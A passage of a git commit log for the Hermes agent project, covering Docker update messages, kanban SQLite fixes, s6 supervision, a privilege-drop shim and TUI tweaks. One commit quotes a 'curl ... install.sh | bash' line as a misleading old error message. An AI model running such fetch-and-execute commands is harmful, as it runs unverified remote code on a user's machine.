   resolve_runtime_provider() and discover_mcp_tools(). The yaml-warning
   tests intend to exercise only the warning-log path, but
   _run_job_impl continues into provider resolution and MCP discovery
   after the warning. Both can spawn subprocesses / hit the network and
   pushed the test over its 30s budget under GHA load.

2. tests/tools/test_browser_supervisor.py — wrapped Chrome teardown
   against the stdlib subprocess._wait() race (bpo-38630). When SIGCHLD
   arrives during proc.wait(), _try_wait(WNOHANG) can return a foreign
   pid and the 'assert pid == self.pid or pid == 0' fires. Fixture now
   catches AssertionError/TimeoutExpired, force-kills, and always reaps
   so no zombie escapes. Same hardening applied to the early-skip branch.
2026-05-27 23:15:41 -07:00
Ben 875d930ac7 test(docker-update): stub subprocess.run in git-install regression guard
The regression-guard test
`test_cmd_update_on_git_install_does_not_print_docker_message` mocked
`is_managed` and `detect_install_method` but not `subprocess.run`, so
once `cmd_update(check=True)` decided this was a git install it shelled
out to a real `git fetch upstream` / `git fetch origin`. On CI runners
the worktree has no `upstream` remote configured and the fetch hung
past the 30s pytest-timeout — test (4) slice failed in #33659 CI.

Fix: stub `subprocess.run` with a successful CompletedProcess-shaped
object whose stdout is `"0\n"`, so:
  - no real git command is ever invoked
  - the rev-list parsing later in the flow (`int(stdout.strip())`)
    succeeds rather than `ValueError`-ing through the test's
    SystemExit catch
  - the flow proceeds far enough to confirm the docker banner is
    absent (the actual assertion)
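
The stubbing technique can be shown in isolation. In this sketch `count_commits_behind` is a hypothetical stand-in for the git portion of the update flow, not a function from the repo; the `"0\n"` stdout and the CompletedProcess-shaped return value follow the description above.

```python
import subprocess
from unittest import mock


def count_commits_behind():
    """Hypothetical stand-in: fetch, then parse a rev-list count."""
    subprocess.run(["git", "fetch", "origin"], capture_output=True, text=True)
    result = subprocess.run(
        ["git", "rev-list", "--count", "HEAD..origin/main"],
        capture_output=True, text=True,
    )
    return int(result.stdout.strip())


# One canned result serves every call, so no real git command ever runs
# and int("0") parses cleanly instead of raising ValueError.
fake = subprocess.CompletedProcess(args=["git"], returncode=0,
                                   stdout="0\n", stderr="")
with mock.patch("subprocess.run", return_value=fake) as run_stub:
    behind = count_commits_behind()
```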

Also broaden the except clause to `(SystemExit, Exception)`: the only
assertion in this test is the negative-banner check on captured stdout;
any further failure in the rest of the update flow is irrelevant to
that contract.

Verified locally: all 7 tests in
`tests/hermes_cli/test_cmd_update_docker.py` pass in 0.39s (previously
the regression-guard test alone consumed 30s+ and got SIGTERM'd).
2026-05-28 15:50:25 +10:00
Ben b924b22a9d fix(docker): hermes update prints docker pull guidance instead of bogus git error
Inside the published Docker image, `hermes update` was hitting the
".git missing → reinstall via curl" fallback:

    ✗ Not a git repository. Please reinstall:
      curl -fsSL https://raw.githubusercontent.com/.../install.sh | bash

That message is wrong on two counts:
  1. It tells the user to run the host-side installer, which would
     install a *new* Hermes on the host — not update the running
     container.
  2. It doesn't mention `docker pull` at all, leaving Docker users
     to figure out the right action from scratch.

`hermes update --check` was worse: it bailed with "Not a git
repository — cannot check for updates." and nothing else.

Fix: detect the Docker install method (already stamped by
`docker/stage2-hook.sh` and surfaced by `detect_install_method()`)
in both update entry points and print a long-form message that
covers:

  - The right command: `docker pull nousresearch/hermes-agent:latest`
  - Restart guidance (`docker compose up -d --force-recreate` /
    re-run `docker run`)
  - How to verify the new version after restart
  - Tag-pinning caveat (`:latest` doesn't move a pinned tag)
  - Config persistence across upgrades (state under `HERMES_HOME` /
    `/opt/data` is bind-mounted and survives)
  - Fork escape hatch (build your own image with the repo's Dockerfile)

Exit code is 1 (matches `managed_error` semantic for "tried to
update but can't update this way").

Plumbing:
  - hermes_cli/config.py: new `format_docker_update_message()` helper
    sits next to the existing `_NIX_UPDATE_MSG` /
    `format_managed_message()` family so the wording lives in one
    place and both call sites (apply path + check path) consume it.
  - hermes_cli/main.py:
      * `cmd_update()`: bail right after the `is_managed()` gate, before
        any of the apply-path branches.
      * `_cmd_update_check()`: bail at the top of the function, before
        the existing `method == "pip"` branch.
    Neither path touches subprocess.run / git when method == "docker".

Coverage:
  - 7 new tests in `tests/hermes_cli/test_cmd_update_docker.py`:
      * `hermes update` in Docker → message + exit 1, no git calls
      * `hermes update --check` (via cmd_update) → same
      * `--yes` / `--force` don't bypass (intentional)
      * `_cmd_update_check` called directly → bails too
      * git/pip installs still take their normal paths (regression guards)
      * `format_docker_update_message` content-lock test pinning the
        five user-actionable bits the message must contain
  - Existing test_cmd_update.py (21 tests) + test_managed_installs.py
    (5 tests) still pass — no regression on the source-install path.
  - Verified end-to-end in a real container: `docker run ... update`
    and `docker run ... update --check` both render the message and
    exit 1.
2026-05-28 15:50:25 +10:00
stephenschoettler 4a6f1863ac test: cover ci-unblocker production regressions
Snapshot review_agent._session_messages before teardown so close() can
clean per-session state without dropping the user-visible
self-improvement summary. Adds two regressions:

- bg-review summarizer receives captured review-agent tool messages
  after review_agent.close() runs
- context-compressor protected-head handoff rehydration populates
  _previous_summary and keeps the old handoff out of newly summarized
  turns

Salvaged from PR #26039 onto current main after agent/background_review.py
extraction. Original commit 63eaf6055; bg-review test updated to patch
the module-level summarize_background_review_actions in
agent.background_review instead of the now-forwarder
AIAgent._summarize_background_review_actions.
2026-05-27 22:14:53 -07:00
Ben 66489f38c7 fix(docker): bake build-time git SHA into the image
`hermes dump` and the startup banner both call `git rev-parse HEAD` to
report the running commit, but `.dockerignore` line 2 excludes `.git` —
so inside the published image `hermes dump` shows
`version: ... [(unknown)]` and the banner drops its `· upstream <sha>`
suffix entirely.  That makes support triage from container bug reports
impossible: we can't tell which commit the user is actually running.

Fix: thread the build-time SHA through as a Docker build-arg, write it
to `/opt/hermes/.hermes_build_sha` in the image, and have a new
`hermes_cli/build_info.get_build_sha()` read it as a fallback after the
existing live-git lookup fails.  Output format is unchanged in both
callsites — same 8-char short SHA whether resolved live or baked.
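
The fallback order can be sketched as below. The file path and the 8-character truncation are from this message; the function signatures, the `live_sha` parameter (standing in for the result of the existing live-git lookup), and the error handling are assumptions rather than the actual contents of `hermes_cli/build_info`.

```python
from pathlib import Path

BUILD_SHA_FILE = Path("/opt/hermes/.hermes_build_sha")


def get_build_sha(path=BUILD_SHA_FILE, length=8):
    """Return the baked short SHA, or None if the file is absent or empty."""
    try:
        text = Path(path).read_text(encoding="utf-8").strip()
    except OSError:
        return None
    return text[:length] or None


def resolve_commit(live_sha, sha_file=BUILD_SHA_FILE):
    """Prefer the live-git result, then the baked SHA, then the legacy marker."""
    return live_sha or get_build_sha(sha_file) or "(unknown)"
```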

Wiring:
  - Dockerfile: `ARG HERMES_GIT_SHA=` + write-file step after the source
    copy.  Empty/missing arg → no file written → callers fall through to
    live git (so local `docker build` without --build-arg is unchanged).
  - docker-publish.yml: passes `HERMES_GIT_SHA=${{ github.sha }}` on all
    four build-push-action steps (amd64/arm64, smoke-test + final push).
  - dump.py:_get_git_commit() / banner.py:get_git_banner_state(): try
    live git first, fall back to baked SHA, then to legacy `(unknown)`
    / None.  Banner returns `upstream == local, ahead=0` because a built
    image is by definition pinned to one commit.

Coverage:
  - Unit tests cover build_info (file present/absent/empty/error,
    truncation, whitespace), dump (live-git wins, both fallbacks,
    identical output-format regression guard), and banner (no-repo +
    baked, no-repo + no-sha, shallow-clone fallback).
  - tests/docker/test_dump_build_sha.py is an integration regression
    guard that runs against the real image, reads
    `/opt/hermes/.hermes_build_sha`, and asserts `hermes dump` surfaces
    its content (or stays at `(unknown)` if no file).
  - Verified end-to-end: `docker build --build-arg HERMES_GIT_SHA=abc...`
    → `docker run ... dump` reports `[abc12345]`; without the build-arg
    it reports `[(unknown)]` as before.
2026-05-28 15:14:05 +10:00
teknium1 ebe04c66cd fix(kanban): close kanban.db FD after every connect() in long-lived processes
`sqlite3.Connection.__exit__` commits/rollbacks but does NOT close the
underlying FD. `with kb.connect() as conn:` in long-lived processes
(gateway `run_slash`, dashboard `decompose_task_endpoint`) therefore
leaks one FD to `kanban.db` per call. After enough operations the
gateway dies with `[Errno 24] Too many open files` (~4 days uptime
in the production report — #33159).

Fix: add a `connect_closing()` context manager in `hermes_cli/kanban_db`
that wraps `connect()` with a real `try/finally: conn.close()`. Switch
the 42 leak-prone call sites in `hermes_cli/kanban.py` (35),
`hermes_cli/kanban_decompose.py` (4), and `hermes_cli/kanban_specify.py`
(3) over to it.
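
A minimal sketch of such a wrapper, using only the standard library, is shown here. The `path` parameter is an assumption for the example (the real `connect()` may resolve the database location itself), and whether the real helper also keeps the commit/rollback behaviour is not stated above; the sketch keeps it by nesting the connection's own context manager.

```python
import contextlib
import sqlite3


@contextlib.contextmanager
def connect_closing(path):
    """Like `with sqlite3.connect(path) as conn:`, but also closes the FD."""
    conn = sqlite3.connect(path)
    try:
        with conn:        # commits on success, rolls back on exception
            yield conn
    finally:
        conn.close()      # the step Connection.__exit__ does not perform


with connect_closing(":memory:") as conn:
    conn.execute("CREATE TABLE tasks (id INTEGER PRIMARY KEY, title TEXT)")
    conn.execute("INSERT INTO tasks (title) VALUES ('demo')")
```

After the block exits, any further use of `conn` raises `sqlite3.ProgrammingError`, which is one way a regression test can confirm the handle was closed.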

`kanban.py` matters because `run_slash` (called from the gateway for
every `/kanban` slash command) parses argparse and dispatches to those
`_cmd_*` functions in-process — each one was leaking one FD per
invocation.

Tests inside `tests/` are untouched: short-lived processes where OS
cleanup masks the leak. Regression tests added in
`test_kanban_db.py` cover both happy-path and exception-path closure,
plus an explicit assertion that bare `with kb.connect()` still does
NOT close (documenting the upstream sqlite3 behaviour we're working
around).

Closes #33159.
2026-05-27 22:07:49 -07:00
Teknium 6d947e4d78 feat(image_gen/fal): add Krea 2 Medium + Large to FAL catalog (#33506)
fal announced Krea 2 day-0 as an official API partner on 2026-05-27.
Add both variants to the FAL_MODELS catalog so they appear in the
'hermes tools' model picker alongside flux-2, gpt-image, nano-banana,
etc. Users who already bill through FAL or a Nous Portal subscription
can now use Krea without registering directly with Krea.

Model IDs (as listed in fal's launch announcement):
  fal-ai/krea/v2/medium/text-to-image  — $0.030 / image
  fal-ai/krea/v2/large/text-to-image   — $0.060 / image

Both share the same parameter schema:
  - aspect_ratio (1:1, 4:3, 3:2, 16:9, 2.35:1, 4:5, 2:3, 9:16)
    mapped from our 3 abstract ratios via size_style='aspect_ratio'
  - creativity (raw|low|medium|high; default medium)
  - seed (reproducibility)
  - image_style_references (up to 10 per Krea's API spec)

No num_inference_steps / guidance_scale / num_images — Krea 2 does
not expose those, and the supports-set filter strips them defensively
if the agent ever passes them.

This is the FAL-routed variant. The separate native-Krea-API plugin
shipped in PR #33236 (plugins/image_gen/krea/) remains available for
users who want to bill directly through Krea's API with their own
key. Both routes converge on the same underlying model.

Nous Portal managed-FAL gateway: this commit makes the model IDs
known to the catalog and the picker. The Portal team will need to
allowlist these two endpoint slugs on the fal-queue origin server-side
for them to flow through the managed billing path.
2026-05-27 21:42:52 -07:00
Wesley Simplicio 10f13c3881 fix(web): allow mobile dashboard scrolling (#28051) (#28577)
* fix(web): allow mobile dashboard scrolling

* fix(web): combine mobile root scroll rules

---------

Co-authored-by: Wesley Simplicio <wesley.simplicio.ext@siemens-energy.com>
2026-05-28 00:02:50 -04:00
Austin Pickett c9410b3462 feat(web): add collapsible sidebar for the dashboard (#33421)
* feat(web): add collapsible sidebar for the dashboard

The desktop sidebar can now be collapsed to an icon-only rail via a
toggle button in the sidebar header.  State is persisted in
localStorage so it survives page reloads.

When collapsed (lg+ only):
- Sidebar shrinks from w-64 to w-14 with a smooth width transition
- Nav items show only their icon with a native title tooltip
- Brand text, plugin headings, system actions, theme/language
  switchers, auth widget, and footer are hidden
- Mobile drawer behavior is unchanged (always full-width)

Co-authored-by: Cursor <cursoragent@cursor.com>

* fix(web): align sidebar tooltips to sidebar edge consistently

Tooltip left position now uses the sidebar's right edge instead of the
anchor element's right edge, so narrow anchors (theme/language switchers)
align with full-width anchors (nav links, system actions).

Co-authored-by: Cursor <cursoragent@cursor.com>

* feat(web): add tooltip animations, restore theme label, rename Sessions tab

- Sidebar tooltips now animate in with a subtle 120ms ease-out slide;
  subsequent tooltips within the same hover sequence appear instantly
  (no delay/animation) following Emil Kowalski's tooltip pattern
- Restore theme name label when sidebar is expanded
- Rename Sessions segment tab to "History" across all 16 locales

Co-authored-by: Cursor <cursoragent@cursor.com>

* fix(web): smooth sidebar collapse animation

- Remove icon centering on collapse; icons stay left-aligned at px-5
  so they don't jump during the width transition
- Text labels fade out with opacity transition instead of instant
  display:none, clipped naturally by overflow-hidden
- Slow collapse duration from 450ms to 600ms for a more relaxed feel
- Gateway dot always rendered with opacity toggle so it doesn't
  slide in from the right on collapse
- Pin gateway dot at fixed left offset (pl-[1.625rem]) to align
  with nav icons
- Align header toggle button with justify-center when collapsed
- Bottom switchers use items-start when collapsed to prevent reflow

Co-authored-by: Cursor <cursoragent@cursor.com>

---------

Co-authored-by: Cursor <cursoragent@cursor.com>
2026-05-27 23:58:41 -04:00
Dusk c341a2d107 fix(docker): align HOME for dashboard and s6 gateway services (#33481) 2026-05-28 13:42:27 +10:00
teknium1 71b4a6b18e fix(docker): install python-is-python3 so bare python resolves in containers
Debian 13 ships only `python3` — there's no `/usr/bin/python` symlink. When
the agent emits bash commands using bare `python` (which models do frequently
from their training prior), every such call fails with:

    /usr/bin/bash: python: command not found
    Tool terminal returned error … exit_code 127

The agent then retries with different approaches, sessions take longer, and
agent.log fills with WARNING noise.

`python-is-python3` is the standard Debian package that drops a
`/usr/bin/python → python3` symlink. ~30 KB, zero behavior change for
anything calling `python3` directly; transparent fix for everything else.

Fixes #33178.
2026-05-28 13:37:17 +10:00
Ben Barclay aeb992d343 fix(docker): drop docker exec to hermes uid before invoking the CLI
When operators ran `docker exec <c> hermes login` (or anything else
that wrote under $HERMES_HOME) they defaulted to root, leaving
/opt/data/auth.json root:root mode 0600. The supervised gateway
(UID 10000) then couldn't read its own credentials and returned
"Provider authentication failed: Hermes is not logged into Nous
Portal" on every Telegram/Discord/etc. message — even though
`docker exec <c> hermes chat -q ping` (also root) succeeded because
root could read its own root-owned file. _load_auth_store swallowed
PermissionError as a parse failure and copied the file aside as
auth.json.corrupt, making the diagnostic more misleading.

Fix: install a privilege-drop shim at /opt/hermes/bin/hermes,
prepended ahead of the venv on PATH. When invoked as root the shim
exec's the real venv binary via `s6-setuidgid hermes` — so any file
the docker-exec session writes is uid-aligned with the supervised
processes. Non-root callers (the supervised processes themselves,
`docker exec --user hermes`, kanban subagents, anything inside the
container that's not coming through docker-exec) hit a single exec
to the absolute venv path with no privilege change.

Recursion is impossible: the shim exec's the venv binary by
absolute path (/opt/hermes/.venv/bin/hermes), so the second hop
cannot re-enter the shim regardless of PATH state. No sentinel env
var needed (unlike #33583's gateway-run redirect which DOES need
HERMES_S6_SUPERVISED_CHILD because there's no absolute-path
equivalent for the s6 dispatch).

Opt-out: `docker exec -e HERMES_DOCKER_EXEC_AS_ROOT=1 …` for
diagnostic sessions where the operator deliberately wants root.
Strict truthiness (1/true/yes case-insensitive); typos like `=0`
do not silently opt out, mirroring HERMES_GATEWAY_NO_SUPERVISE in
#33583.
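
The strict-truthiness rule is restated in Python below purely for illustration; the shim itself is a shell script and this is not its code. The helper name `wants_root` and the `env` parameter are assumptions; the accepted values (1/true/yes, case-insensitive) and the variable name are from the paragraph above.

```python
import os

_TRUTHY = {"1", "true", "yes"}


def wants_root(env=None):
    """True only for an explicit opt-out; any other value keeps the drop."""
    env = os.environ if env is None else env
    return env.get("HERMES_DOCKER_EXEC_AS_ROOT", "").lower() in _TRUTHY
```

Under this rule an unset variable, an empty string, or `0` all leave the privilege drop in place.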

If `s6-setuidgid` is missing (someone stripped s6-overlay in a
downstream fork), the shim exits 126 with a remediation message
pointing at `--user hermes` and the opt-out — never silently runs
as root.

Test plan:
- tests/docker/test_docker_exec_privilege_drop.py — 11 tests
  - shim drops root to hermes uid (file ownership check)
  - shim short-circuits for non-root docker exec
  - HERMES_DOCKER_EXEC_AS_ROOT=1 keeps root
  - strict-truthiness parametrization (5 falsy values reject)
  - main CMD path unaffected (recursion guard)
  - E2E: every file written by docker-exec is readable by uid 10000
- Full tests/docker/ harness: 32/32 pass against fresh image build
- shellcheck --severity=error: clean
- hadolint: clean
- Manual: reproduced the original symptom (root-owned auth.json)
  by bypassing the shim; confirmed default docker-exec produces
  hermes-owned files; confirmed opt-out env keeps root semantics.

Known follow-up: this prevents NEW instances of the bug. Volumes
that already have root:root /opt/data/auth.json from a pre-shim
image need a one-time `chown hermes:hermes` before rebooting onto
the new image. A stage2-hook chown sweep can self-heal that, but
is deferred per scope decision.
2026-05-28 13:30:36 +10:00
Ben Barclay b345323195 fix(docker): tee supervised gateway stdout to docker logs
Follow-up to #33583 (the gateway-run-supervised redirect).

Before this fix, the supervised gateway's stdout (most visibly the
"Hermes Gateway Starting…" rich-console banner) was swallowed by
`s6-log` into the rotated file at
`${HERMES_HOME}/logs/gateways/<profile>/current` and never reached
`docker logs`. Operational signal lived in two places:

  * **docker logs** — saw stderr (Python `logging` defaults to
    stderr), so warnings/errors were visible.
  * **the rotated file** — saw stdout (rich banners, `print()`
    output, third-party libs that wrote to fd 1).

This was surprising for users coming from the pre-s6 image, where
`docker run … gateway run` produced a single unified stream in
`docker logs`. They'd see partial output, conclude something was
broken, and dig around for the missing pieces.

Fix: add the `1` s6-log action directive before the file destination
so each line is forwarded to s6-log's stdout — which propagates up
the s6-supervise pipeline to /init's stdout = container stdout =
`docker logs`. The file destination is preserved as a second
destination, so the rotated log (with ISO 8601 timestamps) still
exists for `hermes logs` and for survival across container restarts.

Trade-off considered: timestamps. Putting `T` between `1` and the
file destination (not before `1`) means:

  * docker logs sees raw lines — Python's logging formatter has its
    own timestamps, and `docker logs --timestamps` adds another
    layer when desired. No double-stamping in the common reading
    path.
  * The persisted file gets s6-log's ISO 8601 timestamp so even
    output that lacked a Python-logger timestamp (rich banners,
    third-party raw prints) is correlatable in `current`.
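
A minimal sketch of the directive ordering described above. The function name `render_s6_log_argv` is hypothetical, and the real rendered run-script may carry further directives; only the relative order of `1`, `T`, and the file destination is taken from this message.

```python
def render_s6_log_argv(log_dir):
    """Build an s6-log argv with stdout forwarding ahead of the file destination."""
    # "1": forward each line to s6-log's stdout (which ends up in docker logs).
    # "T": placed after "1", so only the file destination gets the ISO 8601 stamp.
    # log_dir: the rotated-file destination that holds `current`.
    return ["s6-log", "1", "T", log_dir]
```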

Verification:

  * New unit-test assertion in `test_service_manager.py` locks the
    `s6-log 1` directive into the rendered run-script. Mutation-
    tested by reverting to the pre-fix script (no `1`); the assert
    catches it cleanly.
  * New docker-harness test `test_supervised_gateway_stdout_reaches_docker_logs`
    builds the image, runs `docker run … gateway run`, and asserts
    the unique `⚕` banner glyph reaches `docker logs`. Also verifies
    the rotated file still contains the banner (no regression on
    the existing file destination). Mutation-tested end-to-end: built
    a deliberately-broken image without the `1` directive and the
    test failed exactly as designed, citing the banner present in
    `current` but absent from `docker logs`.
  * `website/docs/user-guide/docker.md` gains a new `:::note Where
    gateway logs go` admonition documenting both destinations and
    the audit-log file at `${HERMES_HOME}/logs/container-boot.log`.

Existing functionality preserved: every other docker-harness test
still passes against the new image. Unit-test sweep across
`tests/hermes_cli/` (5561 tests) is green.
2026-05-28 13:18:41 +10:00
brooklyn! 912e6e2274 fix(tui): suppress mouse-residue leaks during Python launcher startup (#31213)
* fix(tui): suppress mouse-residue leaks during Python launcher startup

`hermes --tui …` spends ~100–300ms inside the Python launcher (lazy
imports, arg parsing, session resolution) before exec'ing the Node TUI
binary. During that window stdin is still in cooked + echo mode. If a
prior session left DEC mouse tracking asserted (or the user spammed
mouse movement while the previous session was opening), the terminal
keeps emitting `\x1b[<…M` SGR motion reports that get echoed straight
back into the user's shell scrollback as literal `^[[<…M` text and
sit there above the TUI banner until the next clear.

The Node side already calls `resetTerminalModes()` in `entry.tsx`, but
by then the race is already lost — the bytes echoed during the Python
warmup window were committed to the scrollback before Node started.

Fix: write the mouse-tracking disable sequence at the very top of
`hermes_cli.main`, before every heavy import. The terminal stops
emitting motion events as soon as the bytes hit the wire (one TTY
round-trip), shrinking the race window from hundreds of milliseconds
to a few. `HERMES_TUI_NO_EARLY_DISABLE=1` opts out for diagnostics.

* test(tui): drop dead _reload_main, hoist import out of patch context

Addresses Copilot review on PR #31213.

The tests used to import `hermes_cli.main` inside the `patch("os.write")`
context, which Copilot pointed out is order-dependent: if the module
is already loaded (e.g. imported by a prior test in the same process),
the import is a no-op and the patch only sees the explicit
`_suppress_mouse_residue_early()` call. Either way the assertion can
flake when run alongside other tests.

Move the import to module scope — every subprocess gets a fresh
`hermes_cli.main`, whose module-level invocation is a no-op under
pytest argv. Tests then exercise `_suppress_mouse_residue_early()`
directly inside their own patch context. Also drop the unused
`_reload_main` helper.

* fix(tui): skip early mouse-disable when stdout is not a TTY

Addresses Copilot review on PR #31213.

`hermes --tui … >log` or CI capture pipes fd 1 away from the terminal.
The disable bytes can't reach the terminal in that case but would
still get written into the log file as raw CSI sequences. Guard with
`os.isatty(1)` inside the existing `try/except OSError` block so the
'never break startup' contract holds.
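
A rough sketch of the early disable with the TTY guard. The exact byte sequence and the `== "1"` opt-out check are assumptions; the `fd` and `environ` parameters are hypothetical and exist only to make the sketch testable.

```python
import os

# Assumed sequence: turns off the common xterm mouse-tracking modes
# (1000 click, 1002 drag, 1003 any-motion, 1006 SGR encoding).
MOUSE_DISABLE = b"\x1b[?1000l\x1b[?1002l\x1b[?1003l\x1b[?1006l"


def suppress_mouse_residue_early(fd=1, environ=None):
    """Best-effort write of the disable bytes; returns True if they were written."""
    env = os.environ if environ is None else environ
    if env.get("HERMES_TUI_NO_EARLY_DISABLE") == "1":
        return False  # diagnostics opt-out
    try:
        if not os.isatty(fd):
            return False  # redirected to a file or pipe: keep CSI bytes out of it
        os.write(fd, MOUSE_DISABLE)
        return True
    except OSError:
        return False  # never break startup
```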

* docs(tui): rephrase 'raw cooked mode' as 'cooked + echo mode'

Copilot review nit on PR #31213 — the original wording was self-
contradictory. Pre-TUI stdin state is cooked + echo (kernel TTY
discipline still owns the line buffer and echoes input back). The
TUI switches it to raw mode later when Ink mounts.
2026-05-27 22:03:45 -05:00
Ben Barclay 0927fb5584 feat(docker): auto-redirect gateway run to supervised mode inside s6 image
Pre-s6, `docker run nousresearch/hermes-agent gateway run` was the
standard invocation: gateway ran as the container's main process,
tini reaped zombies, container exit code matched gateway exit code,
no supervision. With s6-overlay as PID 1, the same invocation now
auto-upgrades to supervised semantics — auto-restart on crash,
dashboard supervised alongside (when HERMES_DASHBOARD=1 is set),
multiple profile gateways under the same /init.

Users get the new behavior with zero changes to their docker run
command. A loud one-line breadcrumb on stderr explains the upgrade
and points at the opt-out for users who genuinely want pre-s6
foreground semantics.

How it works:

  1. `_gateway_command_inner` (the `gateway run` handler) checks if
     we're inside a container with s6 as PID 1.
  2. If yes, dispatches `start` to the s6 service manager (registers
     and starts gateway-default), then `exec sleep infinity` to keep
     the CMD process alive without binding container lifetime to
     gateway PID lifetime. The supervised gateway can flap freely;
     `docker stop` still tears everything down via /init stage 3.
  3. If no, falls through to the existing foreground code path
     unchanged. Host runs of `hermes gateway run` are unaffected.

Three gates make the redirect inert outside the intended scope:

  * `detect_service_manager() != "s6"` — host/non-s6-container runs.
  * `HERMES_S6_SUPERVISED_CHILD=1` env var (recursion guard) —
    exported by `S6ServiceManager._render_run_script` for the
    s6-supervised invocation itself. Without this guard, the
    supervised `gateway run --replace` would re-enter the redirect
    and recurse (run → start → run → start → ...) infinitely.
  * `--no-supervise` CLI flag OR `HERMES_GATEWAY_NO_SUPERVISE=1` env
    var — explicit user opt-out for CI smoke tests, debugging the
    foreground startup path, or any case wanting "CMD exit =
    container exit" semantics. Strict truthiness (1/true/yes,
    case-insensitive); typos like `=0` do NOT silently opt out.
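
The three gates can be read as one predicate. This is a simplified sketch: the function name and signature are hypothetical, and treating the sentinel as an exact `"1"` match is an assumption.

```python
def should_redirect_to_supervised(service_manager, environ, no_supervise_flag=False):
    """Return True only when `gateway run` should hand off to s6 supervision."""
    if service_manager != "s6":
        return False  # host or non-s6 container: keep the foreground path
    if environ.get("HERMES_S6_SUPERVISED_CHILD") == "1":
        return False  # recursion guard: we are the supervised child already
    if no_supervise_flag:
        return False  # explicit --no-supervise
    opt_out = environ.get("HERMES_GATEWAY_NO_SUPERVISE", "")
    if opt_out.lower() in {"1", "true", "yes"}:
        return False  # strict-truthiness env opt-out
    return True
```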

Tests:

  * Unit tests in tests/hermes_cli/test_gateway_s6_dispatch.py
    cover all five paths (host no-op, supervised fire, sentinel
    recursion guard, CLI flag, env var truthy + falsy). The two
    load-bearing gates (sentinel + opt-out) were mutation-tested
    by removing each gate in isolation and confirming the dedicated
    test fails with the expected error.
  * Docker harness tests in tests/docker/test_gateway_run_supervised.py
    cover the round trips end-to-end against a built image: redirect
    fires (sleep-infinity heartbeat + supervised gateway-default
    slot + breadcrumb), --no-supervise opt-out (foreground gateway,
    no want-up on the slot), HERMES_GATEWAY_NO_SUPERVISE env var
    works identically, recursion is impossible (≤1 supervised
    python gateway-run + exactly 1 sleep-infinity parented to the
    CMD wrapper), and HERMES_DASHBOARD=1 produces both supervised
    gateway and supervised dashboard.

Docs:

  * Added a `:::tip Gateway runs supervised` admonition near the
    main docker.md example explaining the upgrade and pointing at
    the opt-out. Pre-s6 (tini-based) images still run gateway run
    as the foreground main process, so the note is scoped to the
    s6 image only.

Trade-off documented in the helper docstring: container exit code
under the redirect is sleep's exit code (always 0 on SIGTERM), not
the gateway's. That was an explicit design call — the supervised
gateway is allowed to flap without taking the container with it,
which is what "supervision" means. CI users who want exit-code
forwarding can pass --no-supervise.
2026-05-28 12:42:13 +10:00
teknium1 36c99af37a test(kanban): align two tests with recent kanban hardening
Two pre-existing test failures on main, both pointing at code that
was hardened recently — not behaviour bugs, test expectations that
fell out of date.

1. tests/tools/test_kanban_tools.py::test_worker_complete_rejects_stale_run_id
   c002668ff ("fix(kanban): add grace period to detect_crashed_workers")
   gates each running task behind a launch-window grace period so
   freshly-spawned workers whose PID isn't yet visible on /proc don't
   get reclaimed. The test creates a worker_env fixture moments before
   asserting reclamation, so the default 30s grace skips the liveness
   check and detect_crashed_workers returns []. Fix: set
   HERMES_KANBAN_CRASH_GRACE_SECONDS=0 in the test so we get the
   immediate-reclaim semantics the assertion expects.

2. tests/tools/test_windows_native_support.py::
     TestKanbanWaitpidWindowsGuard::test_source_gates_waitpid_loop
   ffdc937c1 ("fix(kanban): hoist zombie reaper out of dispatch_once")
   reshaped reap_worker_zombies to use an early-return Windows guard
   (`if os.name == "nt": return []`) instead of an inverted gate
   (`if os.name != "nt":`). Both correctly keep the waitpid loop off
   Windows — the early-return form is stronger because the rest of the
   function never runs. Fix: accept either gate pattern in the source
   scan.

Both failures reproduce verbatim on `origin/main` in a clean env;
neither relates to in-flight work on #33564 (the FD-leak fix). Filing
this as a separate fix-it PR per green-CI-policy so the kanban CI
shard stays green for downstream PRs.
2026-05-27 18:26:44 -07:00
kshitijk4poor 2d5dcfabc3 test(kanban): update dispatcher tick counter for hoisted zombie reaper
The reaper hoist in the prior commit adds an extra
`asyncio.to_thread(_kb.reap_worker_zombies)` call at the top of every
dispatcher tick (before the per-board work). The existing
`test_gateway_dispatcher_disables_corrupt_board_without_traceback`
mocks `to_thread` with a 4-call cap that previously matched 2 full
dispatch ticks. With the reaper hoist each tick is now 3
`to_thread` calls instead of 2, so the cap is raised to 6 to preserve
the same number of dispatch ticks. The `connect == 5` assertion is
unchanged.

Also add the contributor's `steveonjava@gmail.com` to AUTHOR_MAP
alongside `steve@steveonjava.com` so contributor-audit passes for
both identities used across the salvaged commits.

Salvage follow-up for PR #32857.
2026-05-27 14:31:55 -07:00
Stephen Chin dc98314fbd fix(kanban): skip redundant WAL pragma on already-WAL connections
apply_wal_with_fallback() issued PRAGMA journal_mode=WAL on every call,
including connections to DBs already in WAL mode. This triggered the WAL
init code path, causing SQLite to acquire EXCLUSIVE, checkpoint, and unlink
kanban.db-{wal,shm}. Other open connections received (deleted) FDs and
raised sqlite3.OperationalError: disk I/O error.

Add a cheap read probe (PRAGMA journal_mode, no flock/checkpoint/unlink)
before the set-pragma path. If already wal, return early. The set-pragma
and DELETE fallback paths are unchanged.
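
A minimal sketch of the probe-then-set idea, assuming a plain `sqlite3` connection. The name `apply_wal_if_needed` and the `(mode, changed)` return shape are hypothetical, and the DELETE fallback is left out.

```python
import sqlite3


def apply_wal_if_needed(conn):
    """Return (mode, changed); changed is False when the DB was already WAL."""
    # Read probe: reports the current journal mode without switching it.
    current = conn.execute("PRAGMA journal_mode").fetchone()[0]
    if current.lower() == "wal":
        return "wal", False
    # Only reached when the DB is not yet in WAL mode.
    mode = conn.execute("PRAGMA journal_mode=WAL").fetchone()[0]
    return mode.lower(), True
```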

Closes #31158. Addresses root cause that PRs #32226 and #32322 attempted
via connection-sharing/caching approaches.
2026-05-27 14:31:55 -07:00
Stephen Chin ffdc937c18 fix(kanban): hoist zombie reaper out of dispatch_once
Reaper now runs at the top of every dispatcher tick regardless of per-board connect() failures. Previously the reaper sat inside dispatch_once after the kanban_db.connect() call — any EIO during connect would skip reaping for that tick, accumulating zombie workers and stale claim_lock rows.

Also: reap_worker_zombies now returns the list of reaped pids (the dispatcher logs them), and a test indentation error is fixed.

Squashes three sibling commits from PR #32301 into one logical change for batch review.
2026-05-27 14:31:55 -07:00
steveonjava 99c19eb2fe fix(kanban): add post-commit page_count invariant check to write_txn
Reads header bytes 28-31 after every COMMIT and compares against actual file size. Raises sqlite3.DatabaseError on torn-extend (actual_pages < page_count). Also sets PRAGMA wal_autocheckpoint=100 in connect().
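
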